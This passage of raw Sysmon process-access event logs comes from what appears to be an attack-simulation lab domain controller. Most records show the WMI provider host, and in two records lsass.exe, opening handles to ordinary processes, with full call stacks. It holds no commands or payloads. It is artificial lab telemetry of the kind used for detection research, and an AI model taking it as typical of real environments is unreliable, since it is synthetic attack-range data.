:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla 